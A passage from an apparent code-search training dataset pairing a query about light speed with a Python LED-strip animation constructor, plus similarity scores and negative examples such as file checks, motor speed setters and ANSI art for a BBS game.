Please delete \"\n \"or rename the file and restart the program\".format(filename))\n if return_none:\n return None\n sys.exit(1)\n return open(filename, mode)", "def test_empty_file(self):\n field = TypedFileField(required=False)\n for v in EMPTY_VALUES:\n assert field.clean(v) is None", "def f_is_empty(self):\n return self._data is None", "def bulbs_empty():\n check50.run(\"./bulbs\").stdin(\"\").stdout(\"\").exit(0)", "def get_valid_path(file_path: Path, prompt_title: str=\"PATH TO FILE\") -> Path:\n\n print(f\"{Color.EMPHASIS}{prompt_title}{Color.END}\")\n while True:\n if file_path.exists() and file_path.is_file():\n return file_path\n else:\n file_path = Path(input(f\"{Color.INFORMATION}Enter the file's path: {Color.END}\"))", "def filecheck(filename):\n if not os.path.isfile(filename):\n print(\"Can't find %s\" % filename)\n exit(1)\n else:\n return filename", "def nofile(filename):\n if not os.path.isfile(filename):\n return True\n else:\n return False", "def input_file(self):\n if not self.input_file_generated():\n return None\n if self.input_static is False:\n return self._input_generated_file\n else:\n return self._input_uploaded_file", "def is_nonempty_analysis(self, path):\r\n if not os.path.exists(path):\r\n return False\r\n empty_prefix = self.empty_prefix()\r\n with open(path, 'r') as infile:\r\n prefix = infile.read(len(empty_prefix))\r\n return prefix != empty_prefix", "def get_input_file() -> Path:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"GZIPED_FILE\", help=\"gziped file for this problem\")\n args = parser.parse_args()\n return Path(args.GZIPED_FILE)", "def _consume_blanklines(self):\n while True:\n line = self.reader.readline()\n if len(line) == 0:\n return None\n\n if line.rstrip() == '':\n self.offset = self.fh.tell() - self.reader.rem_length()\n continue\n\n return line", "def is_empty():\n try:\n command(\"T\")\n except EppException:\n return False\n else:\n return True", "def test_get_infile(self):\r\n pass # not practically testable, but obvious file I/O\r", "def open_input(self, fn):\n\treturn (None, None)", "def FileCheck(fn):\n try:\n open(fn, \"r\")\n return 1\n except IOError:\n print(\"Error: File does not exist.\")\n return 0", "def is_empty(x):\n\n if not x:\n return None\n else:\n return x", "def is_valid_file(parser, arg):\n\n if not os.path.isfile(arg):\n parser.error('The file {} does not exist!'.format(arg))\n else:\n return arg", "def file_missing(filename):\n return not os.path.isfile(filename)", "def f_is_empty(self):\n return len(self._data) == 0", "def _check_for_incomplete_input(self):\n pass", "def fileCheck(filename):\n if not os.path.isfile(filename):\n print('File: ' + filename + ' not found. 
Exiting...', file=sys.stderr)\n sys.exit(1)", "def checkFile(self,selected_file):\n path_holder = pathlib.Path(selected_file)\n if path_holder.exists():\n if path_holder.is_file():\n if path_holder.stat().st_size == 0 or path_holder.stat().st_size is None:\n raise CoreException.FileEmptyError(\"File should not be empty!\")\n return False\n\n if path_holder.is_symlink():\n raise CoreException.FileNotSupportedError(\"Symbolic link not supported\")\n return False\n \n # File Clean if they pass the required identity of file.\n return True", "def test_reject_empty(self):\n self.spawn(\"./binary\").stdin(\"\").reject()", "def is_valid_file(args):\n if args.file is not None:\n return True\n return False", "def read_input(args, parser):\n if args.text == sys.stdin:\n # check if stdin is empty\n stdin_ready, _, _ = select.select([sys.stdin], [], [], 0)\n if stdin_ready:\n return sys.stdin.read().strip()\n\n parser.print_help()\n sys.exit(1)\n\n return args.text", "def test_getFilenameEmpty(self):\n result = self.client._getFilename(' ')\n\n self.assertEqual(('', ''), result)", "def _read_input_file(self):\n pass", "def check_input(args):\n\n # Defaults\n option = ''\n fh = sys.stdin # file handle\n\n if not len(args):\n # Reading from pipe with default option\n if sys.stdin.isatty():\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n elif len(args) == 1:\n # One of two options: option & Pipe OR file & default option\n if args[0].startswith('-'):\n option = args[0][1:]\n if sys.stdin.isatty(): # ensure the PDB data is streamed in\n emsg = 'ERROR!! No data to process!\\n'\n sys.stderr.write(emsg)\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n else:\n if not os.path.isfile(args[0]):\n emsg = 'ERROR!! File not found or not readable: \\'{}\\'\\n'\n sys.stderr.write(emsg.format(args[0]))\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n fh = open(args[0], 'r')\n\n elif len(args) == 2:\n # Two options: option & File\n if not args[0].startswith('-'):\n emsg = 'ERROR! First argument is not an option: \\'{}\\'\\n'\n sys.stderr.write(emsg.format(args[0]))\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n if not os.path.isfile(args[1]):\n emsg = 'ERROR!! File not found or not readable: \\'{}\\'\\n'\n sys.stderr.write(emsg.format(args[1]))\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n option = args[0][1:]\n fh = open(args[1], 'r')\n\n else: # Whatever ...\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n # Validate option\n if len(option) > 1:\n emsg = 'ERROR!! Alternate location identifiers must be single '\n emsg += 'characters: \\'{}\\''\n sys.stderr.write(emsg.format(option))\n sys.exit(1)\n\n return (option, fh)", "def test_no_eof(self):", "def check_file_flag(file):\n return process_file_flag(file, None)", "def get_file_chunk(self):\n chunk = self.infile.read(self.CHUNK_SIZE)\n if len(chunk) == 0:\n return None\n return chunk" ]
[ "0.68083346", "0.68074083", "0.6786199", "0.67231107", "0.6606845", "0.6573466", "0.65498596", "0.6435035", "0.6296949", "0.6270471", "0.6231167", "0.62046707", "0.61650205", "0.61614615", "0.5990059", "0.58732206", "0.5847673", "0.58417505", "0.5835229", "0.5767335", "0.5743112", "0.57389253", "0.5715131", "0.57133245", "0.57009304", "0.5674514", "0.56160665", "0.5581818", "0.5517408", "0.55089784", "0.55087185", "0.55065066", "0.5503673", "0.54978627", "0.5482728", "0.5457088", "0.54386926", "0.53599465", "0.53463113", "0.5341236", "0.5332263", "0.5324712", "0.5303268", "0.5301716", "0.52993166", "0.52770364", "0.5270631", "0.52631235", "0.52392924", "0.5219671", "0.52173156", "0.52145314", "0.51942164", "0.5167415", "0.51614195", "0.51501244", "0.5146996", "0.5140475", "0.5135851", "0.5124498", "0.51210564", "0.5115838", "0.5104123", "0.50977165", "0.5074384", "0.5070584", "0.5070329", "0.50689656", "0.5065357", "0.5063039", "0.50623125", "0.50598437", "0.5053466", "0.50531805", "0.50521106", "0.50481206", "0.5044508", "0.5043552", "0.5042728", "0.5042656", "0.50410783", "0.50339913", "0.5032774", "0.50300735", "0.50207466", "0.5014487", "0.49995273", "0.4997944", "0.49966508", "0.49919346", "0.49801272", "0.49753392", "0.49631226", "0.49585974", "0.49563372", "0.49424553", "0.49361137", "0.49330163", "0.49265695", "0.49189025" ]
0.88009804
0
Arguments: speeds - speed to move the light across the entire string
def __init__(self, layout, *, count=3, speeds=DEFAULT_SPEED, bounds=None, positions=None, colors=None, widths=None, shapes='linear', accelerations=None, background_color=util.colors.Black, **kwds): super().__init__(layout, **kwds) self.background_color = background_color self.count = count if not positions: if count == 1: positions = [1 / 2] else: positions = [i / (count) for i in range(count)] if not widths: widths = [1 / (2 * count)] accelerations = accelerations or [0] if not isinstance(speeds, (list, tuple)): speeds = [speeds] if not isinstance(accelerations, (list, tuple)): accelerations = [accelerations] if not isinstance(widths, (list, tuple)): widths = [widths] if not isinstance(shapes, (list, tuple)): shapes = [shapes] if not isinstance(positions, (list, tuple)): positions = [positions] if not colors: if count == 1: colors = [util.colors.Yellow] else: colors = [wheel.wheel_helper(p, 1, 0) for p in positions] colors = [(2 * r, 2 * g, 2 * b) for r, g, b in colors] n = len(self.color_list) bounds = bounds or [(0, 1)] A = speeds, accelerations, bounds, positions, colors, widths, shapes def make_light(i): return light.Light(self.color_list, *[a[i % len(a)] for a in A]) self.lights = [make_light(i) for i in range(count)]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def speed(self, s=0):", "def speed(self, speed: int, time: int = 0, /) -> None:", "def walk(self):\n self.speed = self.speed + (0.2 * self.legs)", "def set_speed():\n pass", "def set_speed(self,speed):\n self.speed = speed", "def set_speed(speed):\n if speed >255:\n speed =255\n elif speed <0:\n speed =0\n set_left_speed(speed)\n #time.sleep(.1)\n set_right_speed(speed)", "def set_speed(self, speed: str) -> None:\n self.wink.set_state(True, speed)", "def send_speed(self, linear_speed, angular_speed):\n ### Makes a new Twist message\n msg_cmd_vel = Twist()\n \t# Linear velocity\n \tmsg_cmd_vel.linear.x = linear_speed\n \tmsg_cmd_vel.linear.y = 0.0\n \tmsg_cmd_vel.linear.z = 0.0\n \t# Angular velocity\n \tmsg_cmd_vel.angular.x = 0.0\n \tmsg_cmd_vel.angular.y = 0.0\n \tmsg_cmd_vel.angular.z = angular_speed\n ### Publishes the message\n self.cmd_vel.publish(msg_cmd_vel)", "def run(self):\n global moving_line\n global change_requested\n global thick_1_a, thick_1_b, thick_1_c, thick_2_a, thick_2_b, thick_2_c\n global lap_to_go\n global lights\n line = moving_line\n if line == 1:\n thick_1_a = 1\n lights[2].write(1)\n thick_1_b = -1\n lights[1].write(0)\n time.sleep(self.interval)\n thick_1_b = 1\n lights[1].write(1)\n thick_1_c = -1\n lights[0].write(0)\n thick_2_a = -1\n lights[5].write(0)\n thick_2_b = 1\n lights[4].write(1)\n thick_2_c = 1\n lights[3].write(1)\n line = 2\n else:\n thick_2_a = 1\n lights[5].write(1)\n thick_2_b = -1\n lights[4].write(0)\n time.sleep(self.interval)\n thick_2_b = 1\n lights[4].write(1)\n thick_2_c = -1\n lights[3].write(0)\n thick_1_a = -1\n lights[2].write(0)\n thick_1_b = 1\n lights[1].write(1)\n thick_1_c = 1\n lights[0].write(1)\n line = 1\n\n moving_line = line\n change_requested = 0\n lap_to_go = lap_period_sec", "def set_speed(self,speed):\n self.speed_p = speed", "def increase_speed(self, character):\n character.speed = min(character.max_steps/4, character.speed * 1.25)", "def strut(self):\n self.fwd(left=50, right=50)\n for x in range(2):\n self.servo(1000)\n time.sleep(.1) \n self.servo(1500) # Look Straight\n time.sleep(1)\n self.servo(2000)\n time.sleep(.1)\n self.servo(1500)", "def set_speed(self, speed):\n self.speed = speed", "def move_turtle(self):\n self.forward(self.move_speed)", "def setSpeedEngine1(speed: int):\n pass", "def set_speed(self, speed):\n self._set_sub_text('speed', text=str(speed))\n return self", "def increase_speed(self):\n self.state['speed_boost'] = True\n self.speed = self.maze.block_size / 8", "def setSpeedEngine2(speed: int):\n pass", "def move(self, linear_speed, angular_speed):\n twist = Twist()\n twist.linear.x = linear_speed\n twist.angular.z = angular_speed\n self.pub.publish(twist)", "def change_speed(self, action):\r\n if action == \"faster\":\r\n self.speed += 1\r\n else:\r\n if self.speed > 1:\r\n self.speed -= 1", "def speed(self) -> int:", "def speed(self) -> int:", "def set_speed(self, speed):\r\n speed = float(speed)\r\n speed = int(round(speed * 27.7778))\r\n return self.send_command('speed %s' % speed)", "def set_speed(self, new_speed):\n self.__x_speed, self.__y_speed = new_speed", "def setSpeedEngine3(speed: int):\n pass", "def increase_aliens_speed(self):\r\n self.alien_speed_factor += 0.01\r\n self.alien_bullet_speed_factor += 0.02", "def set_speed(self, speed, motor = 'both'):\n #easily handle setting both or a single motor\n motors = ['speed'] if motor == 'both' else [motor]\n outputs = []\n for motor in motors:\n output = self._send_command(\"%s %s\" % (motor, speed))\n 
outputs.append(output.strip())\n\n return \", \".join(outputs)", "def move_set_speed(self, speed):\n # self.motor_set_speed(MOTOR_LEFT, speed)\n # self.motor_set_speed(MOTOR_RIGHT, speed)\n self.move_speed = speed\n print(\"move_speed is now:\", self.move_speed)", "def setSpeedEngine4(speed: int):\n pass", "def set_speed(self, speed):\n return self.bot_client.send_command(_Command.SetSpeed, speed)", "def set_speed(self, speed):\n # create the MAV_CMD_DO_CHANGE_SPEED command\n msg = self.message_factory.command_long_encode(0, 0,mavutil.mavlink.MAV_CMD_DO_CHANGE_SPEED,0,0,speed,0, 0, 0, 0, 0)\n\n # send command to vehicle\n self.send_mavlink(msg)\n self.flush()", "def increment_speed(self):\n self.speed += 0.0004", "def increase_speed(self):\n self.target_speed *= self.speedup_scale\n self.bullet_speed_factor *= self.speedup_scale", "def set_speeds(self, speed_1, speed_2):\n pass", "def set_cmd_velocity(self, speed):\n self.gripper_io.set_signal_value(\"speed_mps\", speed)", "def setSpeed(self, v):\n\t\tconverted = self.convertSpeed(v)\n\t\tprint(converted)\n\t\t# set both stage speeds\n\t\tself.zaberSend(self.translation[\"hor\"], self.cmd[\"setTargetSpeed\"], data = converted)\n\t\tself.zaberSend(self.translation[\"ver\"], self.cmd[\"setTargetSpeed\"], data = converted)", "def set_speed(self, speed=0):\n speed = clamp(speed)\n self._state.speed = speed\n self.send_command(Command.SET_SPEED, [int(speed)])", "def speed(self, speed):\n self._speed = speed\n self._rotspeed = speed", "def motorSpeed(self, speedRPM_l, speedRPM_r):\n\n self.motors__Direction(speedRPM_l, speedRPM_r)\n\n speedRPM_l = abs(speedRPM_l)\n speedRPM_r = abs(speedRPM_r)\n\n speedRPM_l = self.constrainSpeed(speedRPM_l)\n speedRPM_r = self.constrainSpeed(speedRPM_r)\n\n# Left motor\n pwmDuration = 4095.0 * speedRPM_l / self.motorMaxRPM\n# print(\"MuleBot.motorSpeed Duration left float: \", pwmDuration)\n pwmDuration = int( pwmDuration )\n# print(\"MuleBot.motorSpeed Duration left int: \", pwmDuration)\n startOfPulse = 0\n self.pwm.setPWM(self.dcMotorLeftMotor, startOfPulse, pwmDuration)\n MuleBot.dcMotorPWMDurationLeft = pwmDuration\n\n# Right motor\n #Adjust for right motor being faster\n pwmDuration = 4095.0 * speedRPM_r / self.motorMaxRPM\n pwmDuration = pwmDuration * 9727 / 10000 # 98.519113 percent\n pwmDuration = int( pwmDuration )\n# print(\"MuleBot.motorSpeed Duration right int: \", pwmDuration)\n startOfPulse = 0\n self.pwm.setPWM(self.dcMotorRightMotor, startOfPulse, pwmDuration)\n MuleBot.dcMotorPWMDurationRight = pwmDuration", "def increase_car_speed(self):\r\n self.car_speed += 5", "def speed(self, value: int, /) -> None:", "def move(self, frames_per_second):\n # tuple_add in one line\n position_delta = tuple(map(lambda x: x/frames_per_second, self.velocity))\n velocity_delta = tuple(map(lambda x: x/frames_per_second, (0, GRAVITY)))\n self.position = tuple(sum(x) for x in zip(self.position, position_delta))\n # apply the pull of GRAVITY\n self.velocity = tuple(sum(x) for x in zip(self.velocity, velocity_delta))\n #print('shell.move:postion:{}'.format(self.position))", "def movespeed(self, speed):\n self._speed = speed", "def set_left_speed(speed):\n if speed >255:\n speed =255\n elif speed <0:\n speed =0\n return write_i2c_block(ADDRESS,set_left_speed_cmd+[speed,0,0])", "def set_left_speed(speed):\n if speed >255:\n speed =255\n elif speed <0:\n speed =0\n return write_i2c_block(ADDRESS,set_left_speed_cmd+[speed,0,0])", "def set_speed(self, level):\n speed = self.SPEED + (self.SPEED_INCREMENT * level)\n\n if 
self.lane % 2:\n # Move to the right\n self.velocity = (speed, 0)\n else:\n # Move to the left\n self.velocity = (-speed, 0)", "def set_speed(self, v):\n self.v = v", "def speed(self):\n self.convert_window(\"Speed\", \"meters/second\", [\"Mach number\", \"Nm/24hr\", \"centimeters/minute\", \"centimeters/second\", \"feet/hour\", \"feet/minute\", \"feet/second\", \"inches/minute\", \"inches/second\", \"kilometers/hour\", \"kilometers/second\", \"knots\", \"meters/hour\", \"meters/minute\", \"meters/second\", \"miles/hour\", \"miles/minute\", \"miles/second\", \"nautical miles/hour\", \"speed of light\", \"speed of sound\", \"yards/hour\", \"yards/minute\", \"yards/second\"])", "def set_speed(mode, spd = 0, side = \"both\"):\n global speeds, man_speeds\n \n temp = {}\n if mode:\n temp = speeds\n else:\n temp = man_speeds\n\n # Make sure that spd is between 0-255\n spd = int(spd)\n if spd > 255:\n spd = 255\n elif spd < 0:\n spd = 0\n\n # Send command to the steering module\n if side == \"both\":\n if mode and spd == speeds[LEFT] and spd == speeds[LEFT]:\n return\n temp[RIGHT] = spd\n temp[LEFT] = spd\n steering_port.write(\"s\".encode())\n \n elif side == \"left\":\n if mode and spd == speeds[LEFT]:\n return\n temp[LEFT] = spd\n steering_port.write(\"v\".encode())\n \n elif side == \"right\":\n if mode and spd == speeds[RIGHT]:\n return\n temp[RIGHT] = spd\n steering_port.write(\"h\".encode())\n \n elif side == \"tower\":\n temp[TOWER] = spd\n steering_port.write(\"t\".encode())\n\n steering_port.write(chr(spd))", "def estimate_speed(word_lists, frame_numbers, min_speed = 0.05, max_speed = 0.6, height = None, **kwargs):\n \n #Estimate movement speed of ticker, by looking at position of the same\n #word in consecutive images.\n estimate_sum = 0\n estimate_count = 0\n \n \"\"\"\n #Find a word\n height = - 1\n for word_list in word_lists:\n for word in word_list:\n if len(word['text']) >= 3:\n height = word['bottom'] - word['top'] + 1\n break\n if height != - 1:\n break\n else:\n raise ValueError(\"Cannot estimate speed if there are no words in word_lists!\")\n \"\"\"\n \n #Iterate over every pair of neighbouring frames.\n for i in range(len(frame_numbers) - 1):\n word_list1 = word_lists[i]\n word_list2 = word_lists[i + 1]\n \n frame_diff = frame_numbers[i + 1] - frame_numbers[i]\n \n #Min and max allowable movement of word.\n min_diff = min_speed * height * frame_diff\n max_diff = max_speed * height * frame_diff\n \n #Iterate over all words in neighbouring frames.\n for word1 in word_list1:\n for word2 in word_list2:\n left_diff = word1['left'] - word2['left']\n right_diff = word1['right'] - word2['right']\n \n #Check that is same word.\n if not word1['text'] == word2['text']:\n continue\n #Check that text has moved a reasonable amount.\n if not inrange(left_diff, min_diff, max_diff):\n continue\n if not inrange(right_diff, min_diff, max_diff):\n continue\n #Check that word is long enough to probably not be coincidence.\n if not len(word1['text']) >= 3:\n continue\n \n #Calculate a speed estimate from word pair\n pixel_diff = word1['left'] - word2['left']\n estimate = pixel_diff / frame_diff\n estimate_sum+= estimate\n estimate_count+= 1\n \n return estimate_sum / estimate_count", "def arthur(self):\n\t\tthismsg = 
\"\\r\\n\"+self.ESC+\"34m\"+self.A220+self.ESC+\"1;44m\"+self.A176+self.ESC+\"0;34m\"+self.A220+self.A223+self.A176+self.ESC+\"C\"+self.A178+self.A176+self.A254+self.ESC+\"2C\"+self.A220+self.A254+self.ESC+\"6C\"+self.A220+self.A178+self.ESC+\"C\"+self.A220+self.A178+self.ESC+\"C\"+self.ESC+\"1;44m\"+self.A177+self.ESC+\"40m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.A223+self.A223+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"C\"+self.A223+self.ESC+\"2C\"+self.A176+self.A223+self.A223+self.ESC+\"1;37m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0m\"+self.A220+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A220+self.ESC+\"0m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.ESC+\"34m\"+self.A223+self.ESC+\"3C\"+self.ESC+\"1;37mSaga\"+self.ESC+\"Cof\"+self.ESC+\"Cthe\"+self.ESC+\"CRed\"+self.ESC+\"CDragon\"+self.ESC+\"C-\"+self.ESC+\"C\"+self.ESC+\"34mKing\"+self.ESC+\"CArthurs\"+self.ESC+\"CWeapons \"+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.A223+self.ESC+\"1;37m\"+self.A220+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"C\"+self.ESC+\"0m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A219+self.A219+self.A219+self.ESC+\"30;47m\"+self.A223+self.ESC+\"37;40m\"+self.A219+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A223+self.ESC+\"1;30m\"+self.A223+self.ESC+\"0m\"+self.A223+self.ESC+\"1;30m\"+self.A223+self.A223+self.A220+self.ESC+\"4C\"+self.ESC+\"0;34m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.A220+self.ESC+\"47m\"+self.A219+self.A219+self.A223+self.A178+self.A177+self.A176+self.ESC+\"0m\"+self.A219+self.A223+self.ESC+\"1m\"+self.A220+self.ESC+\"0m\"+self.A223+self.A219+self.A219+self.ESC+\"30;47m\"+self.A223+self.A176+self.ESC+\"37;40m\"+self.A219+self.A219+self.A223+self.A220+self.A223+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.A220+self.ESC+\"C\"+self.ESC+\"1;30;47m\"+self.A178+self.ESC+\"C\"+self.ESC+\"0;34m\"+self.A176+self.ESC+\"3C\"+self.A178+self.ESC+\"20C\"+self.A223+self.ESC+\"17C\"+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"0m 
\"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A219+self.A219+self.A178+self.ESC+\"0m\"+self.A219+self.ESC+\"30;47m\"+self.A176+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.ESC+\"C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A220+self.ESC+\"0m\"+self.A223+self.A219+self.A219+self.A223+self.A220+self.ESC+\"1;47m\"+self.A176+self.ESC+\"0m\"+self.A219+self.ESC+\"C\"+self.A219+self.A219+self.ESC+\"1;47m\"+self.A176+self.A176+self.A176+self.A176+self.ESC+\"30m\"+self.A176+self.ESC+\"C\"+self.ESC+\"40m\"+self.A219+self.ESC+\"3C\"+self.ESC+\"0;34mYou\"+self.ESC+\"Cwalk\"+self.ESC+\"Cinto\"+self.ESC+\"Cthe\"+self.ESC+\"Cwell\"+self.ESC+\"Cknown\"+self.ESC+\"Cweapons\"+self.ESC+\"6C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"44m\"+self.A178+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.A178+self.A178+\" \"+self.ESC+\"0;30;47m\"+self.A223+self.A177+self.ESC+\"37;40m\"+self.A219+self.A219+self.A219+self.ESC+\"C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A220+self.ESC+\"C\"+self.ESC+\"47m\"+self.A177+self.A176+\" \"+self.ESC+\"C\"+self.ESC+\"0m\"+self.A219+self.ESC+\"1;47m\"+self.A176+self.A176+self.A177+self.A177+self.A177+self.A176+self.ESC+\"30m\"+self.A176+self.ESC+\"C\"+self.ESC+\"40m\"+self.A219+self.ESC+\"3C\"+self.ESC+\"0;34mshop,\"+self.ESC+\"Cyou\"+self.ESC+\"Cpause\"+self.ESC+\"Cto\"+self.ESC+\"Clook\"+self.ESC+\"Caround\"+self.ESC+\"Cat\"+self.ESC+\"Call\"+self.ESC+\"Cof\"+self.ESC+\"2C\"+self.A222+self.ESC+\"1;44m\"+self.A177+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.A223+self.ESC+\"47m\"+self.A178+self.A177+self.ESC+\"0m\"+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.ESC+\"C\"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.A177+self.ESC+\"0m\"+self.A220+self.A223+self.A220+self.ESC+\"1;47m\"+self.A176+self.A176+self.A177+self.A177+self.A176+self.A176+self.A176+self.ESC+\"30m\"+self.A176+self.ESC+\"0m\"+self.A223+self.ESC+\"C\"+self.ESC+\"1;30m\"+self.A219+self.ESC+\"3C\"+self.ESC+\"0;34mthe\"+self.ESC+\"Cmany\"+self.ESC+\"Cimplements\"+self.ESC+\"Cof\"+self.ESC+\"Cdestruction.\"+self.ESC+\"2CA\"+self.ESC+\"37m \"+self.ESC+\"4C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"0;34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0m\"+self.A219+self.A219+self.A219+self.A219+self.A219+self.A219+self.A223+self.ESC+\"1m\"+self.A220+self.ESC+\"C\"+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A220+self.A223+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0m\"+self.A220+self.A223+self.ESC+\"1;47m\"+self.A177+self.A176+self.A176+self.ESC+\"0m\"+self.A219+self.ESC+\"30;47m\"+self.A220+self.A176+self.ESC+\"1m\"+self.A177+self.ESC+\"C\"+self.ESC+\"40m\"+self.A178+self.ESC+\"4C\"+self.ESC+\"0;34mfat\"+self.ESC+\"Cman\"+self.ESC+\"Cwoddles\"+self.ESC+\"Cinto\"+self.ESC+\"Cthe\"+self.ESC+\"Croom,\"+self.ESC+\"Cand\"+self.ESC+\"2C \"+self.ESC+\"37m \"+self.ESC+\"2C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"0;30;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C 
\"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A176+\" \"+self.ESC+\"0m\"+self.A219+self.A219+self.A223+self.ESC+\"33m\"+self.A220+self.ESC+\"37m\"+self.A223+self.ESC+\"1m\"+self.A220+self.ESC+\"47m\"+self.A178+self.A178+self.A177+self.ESC+\"0m\"+self.A220+self.ESC+\"1m\"+self.A223+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0;30;47m\"+self.A176+self.A223+self.ESC+\"1m\"+self.A176+self.ESC+\"0m\"+self.A220+self.A223+self.ESC+\"33m\"+self.A220+self.ESC+\"37m\"+self.A223+self.A219+self.A219+self.ESC+\"1;30;47m\"+self.A178+self.ESC+\"C\"+self.ESC+\"40m\"+self.A178+self.ESC+\"4C\"+self.ESC+\"0;34masks\"+self.ESC+\"C\\\"\"+self.ESC+\"1mWadaya\"+self.ESC+\"Cwant\"+self.ESC+\"Ckid?\"+self.ESC+\"0;34m\\\"\"+self.ESC+\"17C\"+self.ESC+\"37m \"+self.ESC+\"2C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"0;30;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"C \"+self.ESC+\"1m\"+self.A219+self.ESC+\"C\"+self.ESC+\"47m\"+self.A176+self.ESC+\"0m\"+self.A219+self.ESC+\"30;47m\"+self.A254+self.A176+self.ESC+\"37;40m\"+self.A223+self.ESC+\"1;33m\"+self.A220+self.ESC+\"43m\"+self.A177+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1;37m\"+self.A223+self.ESC+\"47m\"+self.A177+self.A176+self.ESC+\"0m\"+self.A223+self.A220+self.A220+self.A223+self.A223+self.ESC+\"1;47m \"+self.ESC+\"0m\"+self.A223+self.ESC+\"33m\"+self.A220+self.ESC+\"1;43m\"+self.A177+self.ESC+\"C\"+self.ESC+\"0m\"+self.A219+self.A219+self.ESC+\"1;30m\"+self.A219+self.A223+self.ESC+\"C\"+self.A178+self.ESC+\"47C\"+self.ESC+\"0;34m\"+self.A219+self.ESC+\"30;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"A\"+self.ESC+\"79C\"+self.ESC+\"37m \"+self.ESC+\"34m\"+self.A176+self.ESC+\"C 